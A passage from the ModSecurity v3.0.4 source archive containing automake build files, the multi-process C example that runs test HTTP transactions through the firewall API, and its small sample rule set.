n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags am__DIST_COMMON = $(srcdir)/Makefile.in $(top_srcdir)/depcomp DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ multi_SOURCES = \ multi.c multi_LDADD = \ $(SSDEEP_LDADD) \ $(LUA_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) multi_LDFLAGS = \ -L$(top_builddir)/src/.libs/ \ $(GEOIP_LDFLAGS) \ -lmodsecurity \ -lpthread \ -lm \ -lstdc++ \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(YAJL_LDFLAGS) multi_CFLAGS = \ -I$(top_builddir)/headers \ -I$(top_builddir) \ $(GLOBAL_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .c .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/multiprocess_c/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/multiprocess_c/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list multi$(EXEEXT): $(multi_OBJECTS) $(multi_DEPENDENCIES) $(EXTRA_multi_DEPENDENCIES) @rm -f multi$(EXEEXT) $(AM_V_CCLD)$(multi_LINK) $(multi_OBJECTS) $(multi_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/multi-multi.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .c.o: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(COMPILE) -c -o $@ $< .c.obj: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(COMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .c.lo: @am__fastdepCC_TRUE@ $(AM_V_CC)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCC_TRUE@ $(LTCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCC_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(LTCOMPILE) -c -o $@ $< multi-multi.o: multi.c @am__fastdepCC_TRUE@ $(AM_V_CC)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(multi_CFLAGS) $(CFLAGS) -MT multi-multi.o -MD -MP -MF $(DEPDIR)/multi-multi.Tpo -c -o multi-multi.o `test -f 'multi.c' || echo '$(srcdir)/'`multi.c @am__fastdepCC_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/multi-multi.Tpo $(DEPDIR)/multi-multi.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='multi.c' object='multi-multi.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(multi_CFLAGS) $(CFLAGS) -c -o multi-multi.o `test -f 'multi.c' || echo '$(srcdir)/'`multi.c multi-multi.obj: multi.c @am__fastdepCC_TRUE@ $(AM_V_CC)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(multi_CFLAGS) $(CFLAGS) -MT multi-multi.obj -MD -MP -MF $(DEPDIR)/multi-multi.Tpo -c -o multi-multi.obj `if test -f 'multi.c'; then $(CYGPATH_W) 'multi.c'; else $(CYGPATH_W) '$(srcdir)/multi.c'; fi` @am__fastdepCC_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/multi-multi.Tpo $(DEPDIR)/multi-multi.Po @AMDEP_TRUE@@am__fastdepCC_FALSE@ $(AM_V_CC)source='multi.c' object='multi-multi.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCC_FALSE@ $(AM_V_CC@am__nodep@)$(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(multi_CFLAGS) $(CFLAGS) -c -o multi-multi.obj `if test -f 'multi.c'; then $(CYGPATH_W) 'multi.c'; else $(CYGPATH_W) '$(srcdir)/multi.c'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool clean-noinstPROGRAMS \ mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/multi-multi.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/multi-multi.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/multiprocess_c/multi.c0000644000175000017500000000730013607066010022653 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include #include #include #include #include #include #define FORKS 5 #define REQUESTS_PER_PROCESS 100 char main_rule_uri[] = "basic_rules.conf"; Rules *rules = NULL; ModSecurity *modsec = NULL; void process_special_request (int j) { Transaction *transaction; transaction = msc_new_transaction(modsec, rules, NULL); msc_process_connection(transaction, "127.0.0.1", 12345, "127.0.0.1", 80); msc_process_uri(transaction, "http://www.modsecurity.org/test?foo=herewego", "GET", "1.1"); msc_add_request_header(transaction, "User-Agent", "Basic ModSecurity example"); msc_process_request_headers(transaction); msc_process_request_body(transaction); msc_add_response_header(transaction, "Content-type", "text/html"); msc_process_response_headers(transaction, 200, "HTTP 1.0"); msc_process_response_body(transaction); msc_process_logging(transaction); msc_transaction_cleanup(transaction); } void process_request (int j) { int i; for (i = 0; i < REQUESTS_PER_PROCESS; i++) { if (i == 1 && j == 1) { process_special_request(j); continue; } struct timeval tv; Transaction *transaction; transaction = msc_new_transaction(modsec, rules, NULL); msc_process_connection(transaction, "127.0.0.1", 12345, "127.0.0.1", 80); msc_process_uri(transaction, "http://www.modsecurity.org/test?key1=value1&key2=value2&key3=value3", "GET", "1.1"); msc_add_request_header(transaction, "User-Agent", "Basic ModSecurity example"); msc_process_request_headers(transaction); msc_process_request_body(transaction); msc_add_response_header(transaction, "Content-type", "text/html"); msc_process_response_headers(transaction, 200, "HTTP 1.0"); msc_process_response_body(transaction); msc_process_logging(transaction); msc_transaction_cleanup(transaction); tv.tv_sec = 1; tv.tv_usec = 500; select(0, NULL, NULL, NULL, &tv); } } int main (int argc, char **argv) { int ret; const char *error = NULL; int i = 0; pid_t pid; int f; modsec = msc_init(); msc_set_connector_info(modsec, "ModSecurity-test v0.0.1-alpha (Simple " \ "example on how to use ModSecurity API"); rules = msc_create_rules_set(); ret = msc_rules_add_file(rules, main_rule_uri, &error); if (ret < 0) { fprintf(stderr, "Problems loading the rules --\n"); fprintf(stderr, "%s\n", error); goto end; } msc_rules_dump(rules); for (f = 0; f < FORKS; f++) { pid = fork(); if (pid == 0) { process_request(f); goto child; } struct timeval tv; tv.tv_sec = 0; tv.tv_usec = 500; select(0, NULL, NULL, NULL, &tv); } wait(NULL); child: if (pid == 0) { return 0; } end: msc_rules_cleanup(rules); msc_cleanup(modsec); return 0; } modsecurity-v3.0.4/examples/multiprocess_c/basic_rules.conf0000644000175000017500000000066313607066010024524 0ustar zimmerlezimmerleSecDebugLog /dev/stdout SecDebugLogLevel 9 SecRule REQUEST_HEADERS:User-Agent ".*" "id:1,phase:1,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{MATCHED_VAR}" SecAction "phase:2,initcol:ip=%{REMOTE_ADDR}_%{tx.ua_hash}" SecRule REQUEST_HEADERS:User-Agent ".*" "id:2,phase:2,setvar:ip.auth_attempt=+1" SecRule ARGS:foo "herewego" "id:3,phase:2,setvar:ip.foo=bar" SecRule IP "bar" "id:4,phase:2" SecRule IP:auth_attempt "bar" "id:5,phase:2" modsecurity-v3.0.4/examples/multiprocess_c/Makefile.am0000644000175000017500000000072413607066010023414 0ustar zimmerlezimmerle noinst_PROGRAMS = multi multi_SOURCES = \ multi.c multi_LDADD = \ $(SSDEEP_LDADD) \ $(LUA_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) multi_LDFLAGS = \ -L$(top_builddir)/src/.libs/ \ $(GEOIP_LDFLAGS) \ -lmodsecurity \ -lpthread \ -lm \ -lstdc++ \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(YAJL_LDFLAGS) multi_CFLAGS = \ -I$(top_builddir)/headers \ -I$(top_builddir) \ $(GLOBAL_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/examples/Makefile.am0000644000175000017500000000053613607066010020362 0ustar zimmerlezimmerle ACLOCAL_AMFLAGS = -I build SUBDIRS = \ multiprocess_c \ reading_logs_with_offset \ reading_logs_via_rule_message \ simple_example_using_c \ using_bodies_in_chunks pkginclude_HEADERS = \ reading_logs_via_rule_message/reading_logs_via_rule_message.h # make clean CLEANFILES = # make maintainer-clean MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/doc/0000755000175000017500000000000013607066346015265 5ustar zimmerlezimmerlemodsecurity-v3.0.4/doc/Makefile.in0000644000175000017500000003755013607066346017344 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n 